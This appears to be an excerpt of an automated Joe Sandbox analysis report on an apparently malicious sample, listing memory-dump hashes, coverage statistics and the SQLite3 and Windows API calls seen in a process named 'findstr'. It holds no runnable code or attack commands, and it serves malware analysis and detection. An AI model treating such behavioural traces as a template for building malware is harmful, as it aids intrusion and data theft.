                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 04b1cf80995d6d7db8b06c97b9bece5005e19971a5d4aeca6d3bd323394b2450
                                                                                                    • Instruction ID: 4584ed6612d25a4ba7bf8da4edc958f41077c7309e50949975a4b1731b69ce87
                                                                                                    • Opcode Fuzzy Hash: 04b1cf80995d6d7db8b06c97b9bece5005e19971a5d4aeca6d3bd323394b2450
                                                                                                    • Instruction Fuzzy Hash: 1CF03C74808118CFDB50CF24C485BF8B7B9AB05301F244099D80EAB242C7355A89CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 075618f1a24ea76e14266cb64d8d150cdc3367bbb4a4b460cb99ea341d9c0692
                                                                                                    • Instruction ID: b4a5546a718115198b5b840b0e4a26d0e39f73d73f11328d137f66304b44ff9b
                                                                                                    • Opcode Fuzzy Hash: 075618f1a24ea76e14266cb64d8d150cdc3367bbb4a4b460cb99ea341d9c0692
                                                                                                    • Instruction Fuzzy Hash: A1F03A74D09108EFCB04DFB4E9547BCBFB5BB8A305F1092A9C80AA3291D7705A04DF05
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4138aa4c713e32cb1d2d3d36a1efd8fd0ccff77532fee295c51d1b5d4e09e43
                                                                                                    • Instruction ID: 594a85faa2603a2200b7179c8252abe1774859a4bb15b840d4704fecc2c345ba
                                                                                                    • Opcode Fuzzy Hash: b4138aa4c713e32cb1d2d3d36a1efd8fd0ccff77532fee295c51d1b5d4e09e43
                                                                                                    • Instruction Fuzzy Hash: C6F0B235904228EFCB60CFA4CC84BECBBB9FB49315F2480999449A3251DB326A95DF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: be6797301612788c19b8564a82ad5d065cabc0920d04f697974f523b60f4cbe6
                                                                                                    • Instruction ID: 6a2af0d27f3493d251d792f76fa28b99efe025b8caef68957c1033f4f5a92669
                                                                                                    • Opcode Fuzzy Hash: be6797301612788c19b8564a82ad5d065cabc0920d04f697974f523b60f4cbe6
                                                                                                    • Instruction Fuzzy Hash: 64F08234914114CFCB20CF64C9846E8BBB4FB49315F1542EAC80EA7392D7345E86CF10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 81be611fa9c42f74886ad67e1cf4337778ba2b38cbcf119ab0185ffdbc65d27e
                                                                                                    • Instruction ID: a62754bfe1a947226476e47f95de77f7f10087fb51fd824813abf1104f9f41ef
                                                                                                    • Opcode Fuzzy Hash: 81be611fa9c42f74886ad67e1cf4337778ba2b38cbcf119ab0185ffdbc65d27e
                                                                                                    • Instruction Fuzzy Hash: ACF05E39815154CFC760CF64C984AE8BBB1BB85364F2442DAC429AB3D5D7319A85CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cedf0ddd73059f0718763975524e1e1bfe23f6c04c23665eede8300c01ebafb5
                                                                                                    • Instruction ID: 8b298e8434228074b7a4b8d68e26f8e915ac16977635246ad624bdcb511c6351
                                                                                                    • Opcode Fuzzy Hash: cedf0ddd73059f0718763975524e1e1bfe23f6c04c23665eede8300c01ebafb5
                                                                                                    • Instruction Fuzzy Hash: 26F06D78D08248AFCB00CFA4E455AACBFB0EF49305F1041DED841973A2C7714A00DF41
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e3bd3b75bf193927ea70ada40d766157e8ed6fb564d7d4569b387f6605eb654
                                                                                                    • Instruction ID: b649d1744577cc411d21437982df85a7391820c8d998b56ada746771b700a3a5
                                                                                                    • Opcode Fuzzy Hash: 6e3bd3b75bf193927ea70ada40d766157e8ed6fb564d7d4569b387f6605eb654
                                                                                                    • Instruction Fuzzy Hash: D4E04F74D04148EFDB14CFA5E855BADBF70EB85305F1081AADC41A2391D7710A45DF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 596ffd29f68e64ebc14f684d481ae81dabe463e916d376a86d8c2ea90d1ae90a
                                                                                                    • Instruction ID: 4e48245d84b01ac03e1433213229ea2c4268aa08f751988558814d4233547a39
                                                                                                    • Opcode Fuzzy Hash: 596ffd29f68e64ebc14f684d481ae81dabe463e916d376a86d8c2ea90d1ae90a
                                                                                                    • Instruction Fuzzy Hash: 43E0E5759441189FEB40CF64C880BE8BBB9EB48305F248099E909A3250C6369A86CF10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fa1c8fadfba95806f536b0b6494501ee2f40b9de711565e571171e5d39789d35
                                                                                                    • Instruction ID: 837092170e8c097c72f1853f3391b842bedc631d820d1ca4fa6ba6d2e19da227
                                                                                                    • Opcode Fuzzy Hash: fa1c8fadfba95806f536b0b6494501ee2f40b9de711565e571171e5d39789d35
                                                                                                    • Instruction Fuzzy Hash: 9CE0C2B4C15288EFDB15DFB4B4217AC7FB0EF4130AF1141EDD800AA292D7714A85DB04
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.4%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0.2%
                                                                                                    Total number of Nodes:409
                                                                                                    Total number of Limit Nodes:47

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E87B97
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E87C3A
                                                                                                    • sqlite3_errcode.SQLITE3 ref: 61E887EF
                                                                                                    • sqlite3_close.SQLITE3 ref: 61E88800
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E8881D
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: Ta$'a$3Oa$BINARY$NOCASE$RTRIM$`Qa$fts3$fts4$fts5$fts5vocab$porter$rtree$rtree_i32$simple$unicode61$a
                                                                                                    • API String ID: 1444984659-3772028164
                                                                                                    • Opcode ID: 123a69d633dfa0828cc75513eecb3859b1835af812d5066100662b2363b135b7
                                                                                                    • Instruction ID: 3f0d45df463f7b651d146f343d333c4606a7f4b1179d4b2f89f40fe6038025a8
                                                                                                    • Opcode Fuzzy Hash: 123a69d633dfa0828cc75513eecb3859b1835af812d5066100662b2363b135b7
                                                                                                    • Instruction Fuzzy Hash: 457208B0A083428FE740DF69C59574ABBF1BF84348F24C92DE8998B395D779C845DB82

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 734 61e183f0-61e18467 GetSystemInfo sqlite3_vfs_register * 4
                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNEL32(?,?,61E9D560,?,61E181C5,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1840A
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E18420
                                                                                                      • Part of subcall function 61E1838D: sqlite3_initialize.SQLITE3(?,?,61E18425), ref: 61E18398
                                                                                                      • Part of subcall function 61E1838D: sqlite3_mutex_enter.SQLITE3(?,?,61E18425), ref: 61E183B0
                                                                                                      • Part of subcall function 61E1838D: sqlite3_mutex_leave.SQLITE3(?), ref: 61E183E2
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E18434
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E18448
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E1845C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3532963230-0
                                                                                                    • Opcode ID: 52ec4a19fc2aab4ae50ae70de22719532ee0c0d1c432b0c0c6795e77d9853fff
                                                                                                    • Instruction ID: 3edd3a8b6566b9c5a4dd8858fafa9583b9544e3ccdbc01ac2b2094e74ba9939f
                                                                                                    • Opcode Fuzzy Hash: 52ec4a19fc2aab4ae50ae70de22719532ee0c0d1c432b0c0c6795e77d9853fff
                                                                                                    • Instruction Fuzzy Hash: 47F05EB01082009BC3407F64D10B71EBAE5AFC3708F25C91CD0C887290C771D4819B93
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                                    • String ID: -journal$@
                                                                                                    • API String ID: 42632313-41206085
                                                                                                    • Opcode ID: a93bc94ad71ed339d8b4608d1f49caa565431d3ff91f8c48fe0859b6d92ce3c1
                                                                                                    • Instruction ID: ff9e617349dca51026d64508cef5f65b60382efde76bf602cff4c7a40dee043a
                                                                                                    • Opcode Fuzzy Hash: a93bc94ad71ed339d8b4608d1f49caa565431d3ff91f8c48fe0859b6d92ce3c1
                                                                                                    • Instruction Fuzzy Hash: 1D820474A042658FEB20CF68D884B89BBF1BF49308F29C1E9D8589B352D774D985CF51

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38CEB
                                                                                                      • Part of subcall function 61E3898C: sqlite3_free.SQLITE3 ref: 61E389FE
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E38D18
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38D7D
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38D88
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E38DF7
                                                                                                    • CreateFileW.KERNEL32 ref: 61E38E30
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38EE8
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38EF3
                                                                                                      • Part of subcall function 61E1781C: sqlite3_win32_sleep.SQLITE3 ref: 61E17874
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38F64
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38F6F
                                                                                                    • sqlite3_uri_boolean.SQLITE3 ref: 61E38FAD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                                                                    • String ID: winOpen
                                                                                                    • API String ID: 1995518269-2556188131
                                                                                                    • Opcode ID: 49adb77ac8b3b831f20fdaec36c83601c63fc3364e482cbb3a97ecc07e7a76ec
                                                                                                    • Instruction ID: e6329ef24f41e58f8916704f82f3a9eff6f6b2eeb74c1c2f4eb0ce09deb5b482
                                                                                                    • Opcode Fuzzy Hash: 49adb77ac8b3b831f20fdaec36c83601c63fc3364e482cbb3a97ecc07e7a76ec
                                                                                                    • Instruction Fuzzy Hash: 64B1D6709047598FDB10DFA9C484B8EBBF1BF84318F208A29E8A9DB340D775D985CB41

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E180E1
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E180EE
                                                                                                    • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E18173
                                                                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E18199
                                                                                                    • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E181BB
                                                                                                    • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E181C0
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E18294
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1829F
                                                                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182BB
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182D0
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                    • String ID:
                                                                                                    • API String ID: 1590227068-0
                                                                                                    • Opcode ID: 80a5970e6370cfc5b7bc3f72f4d4c019705f10290a1ac95abcf057781b033f64
                                                                                                    • Instruction ID: 73fa22b50c015a8cab200e6346dd9cd00bf4cefcb342181f63bea50dac709f51
                                                                                                    • Opcode Fuzzy Hash: 80a5970e6370cfc5b7bc3f72f4d4c019705f10290a1ac95abcf057781b033f64
                                                                                                    • Instruction Fuzzy Hash: 6A916BB8A18A048FEF809FA8C545B897BF1FB8B319F24842ED4549B384D779D885DB41

                                                                                                    Control-flow Graph (first node 61E5D697; legend: Executed / Not Executed)
                                                                                                    Strings
                                                                                                    • unsupported file format, xrefs: 61E5D82E
                                                                                                    • sqlite_temp_master, xrefs: 61E5D6AE
                                                                                                    • sqlite_master, xrefs: 61E5D69F
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 61E5D7C4
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                                    • API String ID: 0-2834926380
                                                                                                    • Opcode ID: 8739f13f59b9245f99ca6944896ae9b81abf59a9b8b531b7f047787198e01ecd
                                                                                                    • Instruction ID: 1be8f6910a3ae35ae87dffa4376a615c56992fe466103ec56f342520aa12577b
                                                                                                    • Opcode Fuzzy Hash: 8739f13f59b9245f99ca6944896ae9b81abf59a9b8b531b7f047787198e01ecd
                                                                                                    • Instruction Fuzzy Hash: 89911478A043488BDB51CFA9C480B8EBBF2BF88318F24C42DD8599B355D776E856CB41

                                                                                                    Control-flow Graph (first node 61E3CDC1; legend: Executed / Not Executed)
                                                                                                    • API ID: memcmp$sqlite3_mutex_try
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2794522359-4108050209
                                                                                                    • Opcode ID: d5c7d553be4ccfe833e47b58c5c820338c12739a1a8f5454219947979e8f550f
                                                                                                    • Instruction ID: 786c7f98bf4c6c3a3e249f4f49677c74471b5160d10ff668d6a4710e3668878d
                                                                                                    • Opcode Fuzzy Hash: d5c7d553be4ccfe833e47b58c5c820338c12739a1a8f5454219947979e8f550f
                                                                                                    • Instruction Fuzzy Hash: E202AF74A052658FEB05CFA9C08079EBBF1BFC9318F64C56AE8469B381D774E885CB50

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 61E03D95: sqlite3_stricmp.SQLITE3 ref: 61E03DC2
                                                                                                      • Part of subcall function 61E03D95: sqlite3_stricmp.SQLITE3 ref: 61E03DDA
                                                                                                    • sqlite3_strnicmp.SQLITE3 ref: 61E5DF16
                                                                                                      • Part of subcall function 61E04501: sqlite3_stricmp.SQLITE3 ref: 61E04534
                                                                                                    • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                                                                                    • String ID: no such table$no such view$a
                                                                                                    • API String ID: 2198927396-2766804909
                                                                                                    • Opcode ID: 3dc196702ad696232c7d7ff74c9327f507a8a2d56c619baae405a905a5a1f322
                                                                                                    • Instruction ID: bdc448d37d95c4fff2c788df1c328a5e009ca0cc8d30dd90e6a25b25119044c8
                                                                                                    • Opcode Fuzzy Hash: 3dc196702ad696232c7d7ff74c9327f507a8a2d56c619baae405a905a5a1f322
                                                                                                    • Instruction Fuzzy Hash: 8B611374B057469BDB44DFA9C480A4EBBF1BF88348F20C42DE859DB314EB76E8518B91

                                                                                                    Control-flow Graph (first node 61E272A7; legend: Executed / Not Executed)
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID: winRead
                                                                                                    • API String ID: 2738559852-2759563040
                                                                                                    • Opcode ID: 5d8038751a82f134f99a0a7a259cd409cb26f714c0bee21373308b17d2acead1
                                                                                                    • Instruction ID: fa3fdd52a5bd0e73c2820272329c91b65345a39805b42513b8c1f8e61fe294ac
                                                                                                    • Opcode Fuzzy Hash: 5d8038751a82f134f99a0a7a259cd409cb26f714c0bee21373308b17d2acead1
                                                                                                    • Instruction Fuzzy Hash: 45410F71E00259DBCF44DFA9D89158EBBF2BF89314F21852AEC28A7304D730E942CB91
                                                                                                    APIs
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24646
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E24666
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 61E24673
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E2468A
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E246DA
                                                                                                    • sqlite3_result_text64.SQLITE3 ref: 61E2482A
                                                                                                    • sqlite3_result_blob64.SQLITE3 ref: 61E24884
                                                                                                    • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3992148849-0
                                                                                                    • Opcode ID: 966d3bdd9b7ec2c637396d11471a01c6ca43b8ab05bb269a022240967d8b712a
                                                                                                    • Instruction ID: 0e2c23331c16ee84630063ef5aef98a0784d42d9ec2d87b3402f6ad6c8ba083b
                                                                                                    • Opcode Fuzzy Hash: 966d3bdd9b7ec2c637396d11471a01c6ca43b8ab05bb269a022240967d8b712a
                                                                                                    • Instruction Fuzzy Hash: 33918675E046598FDB05CFA8C8A069DBBF1BF8A324F29C21AE87497394D770D842CB51
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E6E7F9
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6EA09
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: BINARY$INTEGER$<a$a
                                                                                                    • API String ID: 1477753154-2175779638
                                                                                                    • Opcode ID: d96a0b779c40d877e4a5ea39f1b8b94e9ebd00cb949280cc5aa1c7409108143f
                                                                                                    • Instruction ID: e9e397302c3e127faf88cdbef33f3d2741ed8d540d40db6e1a65927733d023d1
                                                                                                    • Opcode Fuzzy Hash: d96a0b779c40d877e4a5ea39f1b8b94e9ebd00cb949280cc5aa1c7409108143f
                                                                                                    • Instruction Fuzzy Hash: 8F713C74A44A599FDB00CFAAC88479EBBF5BF48358F69C129EC58A7380D734D841CB90
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1984881590-0
                                                                                                    • Opcode ID: 5422215c925a4c1103006817d788c6ebf1975ae7803c617e75f824470805e615
                                                                                                    • Instruction ID: 4046693fdad71867530765ecb70e61449d3145db7261924f97f5e02b0f474fec
                                                                                                    • Opcode Fuzzy Hash: 5422215c925a4c1103006817d788c6ebf1975ae7803c617e75f824470805e615
                                                                                                    • Instruction Fuzzy Hash: 65E1E475E08249CFDB04CF68C481A9ABBF2FF88314F25C569E815AB359D734E952CB90
                                                                                                    APIs
                                                                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 61E88BC9
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BDA
                                                                                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BE2
                                                                                                    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BEA
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BF9
                                                                                                    Similarity
                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 1445889803-0
                                                                                                    • Opcode ID: f979607e9c19fe23d2a6c795d640752146a977690ceef806feb967e8c33f18e5
                                                                                                    • Instruction ID: 0a5873e2bc5124469f1366149606b3e9f6f9164544f02eb58db9808e09a7cadc
                                                                                                    • Opcode Fuzzy Hash: f979607e9c19fe23d2a6c795d640752146a977690ceef806feb967e8c33f18e5
                                                                                                    • Instruction Fuzzy Hash: F511ACB55153058FDB40DFB8E48855FBBE4FB89664F05093AE448C7301DB35D489C792
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E427E0
                                                                                                      • Part of subcall function 61E134FC: sqlite3_mutex_try.SQLITE3(?,?,?,61E1357C), ref: 61E1349C
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E427F9
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E4290D
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E42D28
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                    • String ID:
                                                                                                    • API String ID: 2068833801-0
                                                                                                    • Opcode ID: 9dd1dee0b090503883bfa7540a95ac35d5294d1cb050199fd299c94f222e3818
                                                                                                    • Instruction ID: f8e54874a3c2ac4bcf1411c80c60bbf1a4d80081bb58b7faf65da07f2dce8136
                                                                                                    • Opcode Fuzzy Hash: 9dd1dee0b090503883bfa7540a95ac35d5294d1cb050199fd299c94f222e3818
                                                                                                    • Instruction Fuzzy Hash: B8021474A046068FDB10CFA9E480A9DFBF1BFA8318F25C529E855DB311DB74E842CB40
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E29199
                                                                                                      • Part of subcall function 61E29044: sqlite3_mutex_leave.SQLITE3 ref: 61E29083
                                                                                                    • sqlite3_bind_double.SQLITE3 ref: 61E291BC
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465616180-0
                                                                                                    • Opcode ID: 969964f748c3dbf5faddc566b324f44d6478a9ff4673fe3bfaa9967b1d7da70a
                                                                                                    • Instruction ID: 21126599560bac39a215f10e5636eacba757eb216256e2242c3340fbe41f308c
